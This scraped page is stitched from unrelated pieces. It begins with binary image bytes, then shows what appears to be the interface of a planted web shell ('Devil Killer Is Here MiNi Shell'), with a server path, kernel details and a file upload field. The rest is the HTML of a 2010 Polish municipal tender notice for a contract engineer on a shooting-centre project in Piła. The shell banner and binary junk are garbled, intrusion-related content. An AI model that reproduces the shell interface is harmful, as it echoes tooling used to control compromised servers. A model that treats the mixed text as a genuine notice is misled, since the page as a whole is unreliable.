JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100903/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100903/240091-N-2010.html

<p class="kh_header"><b>Piła: Pełnienie funkcji Inżyniera Kontraktu przy budowie przedsięwzięcia: Rewitalizacja obszaru powojskowego w Pile przy al. Powstańców Wlkp. - Centrum Strzelectwa Sportowego</b><br>
<b>Numer ogłoszenia: 240091 - 2010; data zamieszczenia: 03.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piła , Pl. Staszica 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2126210, faks 067 2123566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Kontraktu przy budowie przedsięwzięcia: Rewitalizacja obszaru powojskowego w Pile przy al. Powstańców Wlkp. - Centrum Strzelectwa Sportowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pełnienie funkcji Inżyniera Kontraktu przy budowie przedsięwzięcia: 
Rewitalizacja obszaru powojskowego w Pile przy al. Powstańców Wlkp. - Centrum Strzelectwa Sportowego 
Przedsięwzięcie budowlane polega na:
1)wykonaniu kompleksu strzelnic wraz z wyposażeniem w urządzenia i sprzęt technologiczny
2)wykonaniu zaplecza szkoleniowego i techniczno-administracyjnego
3)wykonaniu zagospodarowania terenu wraz z komunikacją wewnętrzną, sieciami i przyłączami 
4)wykonaniu i dostawa tablic informacyjnych i pamiątkowych
5)uzyskaniu decyzji pozwolenia na użytkowanie dla wszystkich obiektów.
Zakres obowiązków i czynności Wykonawcy:
1)pełnienie nadzoru inwestorskiego zgodnie z obowiązującym  polskim Prawem budowlanym
2)zapoznanie się z dokumentacją techniczną inwestycji
3)nadzór i kontrola nad właściwym i terminowym wdrażaniem inwestycjii zgodnie z przepisami w tym zasadami i wytycznymi dla przedsięwzięcia współfinansowanego ze śródków Unii Europejskiej - WRPOO na lata 2007-2013,
4)reprezentowanie interesów Zamawiającego na budowie w zakresie spraw technicznych i ekonomicznych w ramach dokumentacji projektowej, prawa budowlanego oraz umowy na realizację inwestycji,
5)wspieranie Zamwiającego we wszystkich czynnościach technicznych, administracyjnych i finansowych związanych z realizacją przedsięwzięcia;
6)monitorowanie postępu prac, włącznie ze składaniem okresowych raportów je określających, w których będą wzięte pod uwagę zarówno wskaźniki fizyczne, jak i finansowe,
7)zabezpieczenie profesjonalnego i kompletnego nadzoru inwestorskiego nad prowadzonymi robotami;
8)zapewnienie codziennej dyspozycyjności nadzoru na placu budowy,
9)współpraca z nadzorem autorskim
10)nadzór i akceptacja przeprowadzonych testów i technologicznych rozruchów,
11)zapewnienie zgodności wykonanych robót z technicznymi i umownymi wymaganiami wykonania robót,
12)rozwiązywanie bieżących problemów technicznych w trakcie realizacji zadania
13)nadzór rzeczowo-terminowy w zakresie przygotowania dokumentów niezbędnych do uzyskania decyzji pozwolenia na użytkowanie
14)rzeczowe i finansowe rozliczenie robót budowlanych,
15)zachowanie poufności informacji.
16)utrzymywanie na bieżąco łączności i sprawozdawczości między wszystkimi uczestnikami inwestycji
17)zatwierdzanie rysunków zamiennych i uzupełniających wykonanych w ramach nadzoru autorskiego
18)kontrola i nadzór nad zgodnością realizacji robót  z odpowiednimi wymaganiami bezpieczeństwa i ochrony zdrowia, bezpieczeństwa przecipożarowego, przepisów związanych z ochroną środowiska
19)akceptowanie PZJ (Programu Zapewnienia Jakości),
20)zatwierdzanie i kontrolowanie jakości wykonywanych robót, wbudowanych materiałów i ich zgodności z obowiązującymi normami, przepisami  i specyfikacją techniczną,
21)zatwierdzanie proponowanych metod i technologii wykonywania robót budowlanych, włączając w to roboty tymczasowe, zaproponowane przez  Wykonawcę,
22)kontrolowanie wytwórni materiałów w celu sprawdzenia zgodności i akceptacji stosowania metod wytwarzania, 
23)kontrolowanie zgodności wykonanych robót z dokumentacją projektową, umową i obowiązującym w trakcie realizacji harmonogramem robót,
24)sprawdzanie przed wbudowaniem stosowanych materiałów w zakresie dopuszczenia do stosowania zgodnie z wymogami określonym w art. 10 Prawa budowlanego oraz innymi przepisami wynikającymi ze specyfiki technologii strzelectwa;
25)rekomendowanie wszystkich zmian w planach i specyfikacjach, które mogą okazać się niezbędne lub pożądane podczas lub w następstwie  wykonywania robót budowlanych,
26)szacowanie i weryfikowanie robót dodatkowych zaproponowanych przez Wykonawcę, w zakresie wartości fizycznych i finansowych, 
27)uzgadnianie z Zamawiającym wszelkich zmian dotyczących wartości robót,
28)negocjowanie z Wykonawcą i pisemne rekomendowanie Zamawiającemu na bieżąco wszystkich robót spoza harmonogramu,
29)sporządzanie protokołów konieczności w przypadku potrzeby wykonania robót dodatkowych lub zamiennych, uzasadnienie konieczności  wykonywania tych prac oraz wnioskowanie do Zamawiającego o ich wykonanie,
30)sprawdzanie ilości i jakości wykonywanych robót, dokonywanie odbiorów częściowych, dokonywanie odbioru robót zanikających i ulegających  zakryciu,
31)organizowanie, minimum raz w miesiącu, rad budowy dotyczących postępu robót z udziałem przedstawicieli Zamawiającego, wykonawcy robót oraz sporządzanie protokołu dla zainteresowanych stron;
32)weryfikacja rysunków powykonawczych, robót zinwentaryzowanych na geodezyjnych mapach powykonawczych dostarczonych przez   wykonawcę  robót;
33)organizacja oraz przeprowadzenie odbiorów częściowych, końcowych i ostatecznego tj. podjęcie wszelkich niezbędnych czynności dla prawidłowego przeprowadzenia odbiorów, łącznie z powołaniem komisji odbiorowych oraz przygotowaniem protokołów odbioru w porozumieniu
z Zamawiającym; 
34)przygotowanie protokołów końcowych; 
35)wykonywanie dokumentacji fotograficznej podczas prowadzenia inwestycji oraz po jej zakończeniu,
36)rozliczenie wykonawcy robót pod względem rzeczowym i finansowym
37)nadzór i sprawdzenie poprawności wykonania inwentaryzacji środków trwałych w poszczególnych obiektach oraz przygotowanie dokumentów OT zgodnie z obowiązującymi przepisami oraz wytycznymi dla przedsięwzięć współfinansowanych ze środków Unii Europejskiej;. 
38)informowanie Zamawiającego na bieżąco o postępach w realizacji robót, stwierdzonych nieprawidłowościach lub zagrożeniach w realizacji robót  wynikających z zatwierdzonego przez zamawiającego harmonogramu robót oraz informowanie o sposobach ich rozwiązywania i/lub działaniami  korygującymi, mającymi na celu usuwanie tych problemów,
39)wyjaśnianie wątpliwości, przygotowanie wspólnie z Zamawiającym pisemnych wyjaśnień - jeśli taka konieczność zaistnieje. 
40)współpraca z Zamawiającym w egzekwowaniu postanowień umowy na roboty budowlane,
41)ocenianie i rozstrzyganie wszelkich roszczeń, związanych z realizacją umowy na roboty budowlane, problemów powstałych podczas robót, zapobieganie sporom i opóźnieniom, gdy jest to wykonalne,
42)organizowaniu i uczestnictwie w przeglądach gwarancyjnych z wykonawcą robót (minimum raz w roku) - po zakończeniu robót (okres gwarancji  na roboty budowlane - 36 miesięcy od daty odbioru końcowego),
43)każdorazowe uczestnictwo w przeglądach w przypadku pojawieniia się wad, zgłaszanych Wykonawcy robót, okresowej inspekcji wad usuwanych przez Wykonawcę, 
44)uczestnictwie w rozwiązywaniu sporów wynikłych na tle realizacji umowy o roboty budowlane w okresie gwarancyjnym,
45)zarekomendowaniu zwrotu zobowiązań wynikających z umowy z Wykonawcą robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 3600,00</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonał w okresie ostatnich trzech lat przed dniem wszczęcia postepowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej trzy  usługi, których przedmiotem było pełnienie funkcji Inżyniera Kontraktu lub sprawowanie nadzoru inwestorskiego wraz z rozliczeniem budowy dla obiektów kubaturowych o kategorii złożoności robót budowlanych  4 (czwartej)  lub wyższej,  których wartość realizowanych robót budowlanych wynosiła co najmniej 4 mln PLN netto. (kategoria złożoności robót budowlanych  wg pkt 1.4 oraz tabeli  2 Załącznika do Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. (Dz.U.Nr 130  z 2004 poz. 1389).

W przypadku złożenia oferty wspólnej warunki wyszczególnione w tym punkcie Wykonawcy muszą spełniać łącznie.  
Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu  na podstawie oświadczeń i dokumentów na zasadzie spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach, jakie mają załączyć Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wskaże następujące osoby posiadające doświadczenie i kwalifikacje odpowiednie do stanowisk, jakie  zostaną tym osobom powierzone, spełniającymi poniższe wymagania:

a) Lider zespołu  - posiada:
   -  wykształcenie wyższe techniczne lub ekonomiczne; 
   -  co najmniej 5-letnie doswiadczenie zawodowe w kierowaniu zespołem ludzi prowadzącym nadzór nad inwestycjami
       budowlanymi ;
-   posiada doświadczenie obejmujące pełnienie co najmniej raz funkcji lidera zespołu Inżyniera/Przedstawiciela
       wykonawcy przy realizacji zakończonej inwestycji o wartości robót budowlanych nie mniejszej niż 4 mln PLN netto

b) Inspektor nadzoru branży konstrukcyjnej  - posiada:
    -     wykształcenie wyższe techniczne; 
    -     uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w  specjalności  konstrukcyjno -
         budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały  wydane na podstawie wcześniej
         obowiązujących przepisów;
    -    posiada co najmniej 3-letnie doświadczenie zawodowe  w pełnieniu samodzielonej funkcji technicznej (po uzyskaniu
         uprawnień budowlanych ) w kierowaniu budową,  robotami branżowymi lub w nadzorze inwestorskim w  danej branży ;
    -    przynależność do Izby Inżynierów Budownictwa

c) Inspektor nadzoru  branży sanitarnej  - posiada:
    -    uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie
         sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające
         im ważne uprawnienia budowlane, które zostały wydane na podstawie  wcześniej obowiązujących  przepisów; 
    -    co najmniej 3-letnie doświadczenie zawodowe w pełnieniu samodzielonej funkcji technicznej (po uzyskaniu uprawnień
         budowlanych ) w kierowaniu budową,  robotami branżowymi lub w nadzorze inwestorskim w danej branży, 
    -    przynależność do Izby Inżynierów Budownictwa.

d) Inspektor nadzoru branży elektrycznej  - posiada:
    -    uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie
         sieci, instalacji i urządzeń elektrycznych I elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane,
         które zostały wydane na podstawie wcześniej obowiązujących przepisów;
   -     co najmniej 3-letnie doświadczenie zawodowe w pełnieniu samodzielonej funkcji technicznej (po uzyskaniu uprawnień
          budowlanych ) w kierowaniu budową,  robotami branżowymi lub w nadzorze inwestorskim w danej branży ;
   -     przynalezność do Izby Inżynierów Budownictwa.

e) Inspektor nadzoru w branży automatyki kontrolno - pomiarowej - posiada: 
   -     wykształcenie wyższe techniczne w specjalności elektryk, elektronik lub automatyk;
   -     co najmniej 5-letnie doswiadczenie zawodowe w zakresie montażu, rozruchu i eksploatacji w  dziedzinie systemów
         kontrolno - pomiarowych i automatyki.

f) Inspektor nadzoru branży drogowej - posiada:
   -     uprawnienia budowlane do kierowania robotami budowlanymi  w specjalności drogowej lub odpowiadające im ważne
         uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
   -     posiada co najmniej 3-letnie doświadczenie zawodowe w pełnieniu samodzielonej funkcji technicznej (po uzyskaniu
         uprawnień budowlanych ) w kierowaniu budową,  robotami branżowymi lub w nadzorze inwestorskim w danej branży ;
   -     przynależność do Izby Inżynierów Budownictwa.

g) Inspektor nadzoru  branży teletechnicznej   - posiada:
   -     uprawnienia budowlane do kierowania robotami budowlanymi  w specjalności teletechnicznej lub odpowiadające im
         ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
   -     posiada co najmniej 3-letnie doświadczenie zawodowe w pełnieniu samodzielonej funkcji technicznej (po uzyskaniu
         uprawnień budowlanych ) w kierowaniu budową,  robotami branżowymi lub w nadzorze inwestorskim w danej branży ;
   -     przynależność do Izby Inżynierów Budownictwa.
W przypadku złożenia oferty wspólnej warunki wyszczególnione w tym punkcie Wykonawcy muszą spełniać łącznie.  
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu  na podstawie oświadczeń i dokumentów na zasadzie spełnia - nie spełnia. 
wymagane ubezpieczenie.   
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu  na podstawie oświadczeń i dokumentów  na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada polisę lub inny dokument ubezpieczeniowy potwierdzający, że  jest ubezpieczony od  odpowiedzialności  cywilnej w zakresie prowadzonej działalności gospodarczej. Wykonawca, którego oferta wybrana zostanie jako najkorzystniejsza, przed podpisaniem umowy winien przedłożyć polisę lub inny dokument ubezpieczeniowy potwierdzający, że  jest ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej działalności gospodarczej na kwotę nie niższą niż 4 mln złotych (cztery miliony złotych). 
W przypadku złożenia oferty wspólnej każdy z wykonawców winien posiadać wymagane ubezpieczenie.   
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu  na podstawie oświadczeń i dokumentów  na zasadzie spełnia - nie spełnia. 
3) Zamawiający dokonuje opisu sposobu dokonywania oceny spełniania warunków w zakresie dla niego niezbędnym; opis nie musi dotyczyć każdego z warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>b) Parafowany projekt umowy
c) Pełnomocnictwo do reprezentowania w postępowaniu, ( w przypadku podmiotów występujących wspólnie).
d) dokument wniesienia wadium (potwierdzony za zgodność z oryginałem)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>A.  Zmiana okresu przewidzianego na ukończenie usług/robót:
1)zmiany spowodowane warunkami atmosferycznymi, w szczególności:
   a)    klęski żywiołowe;
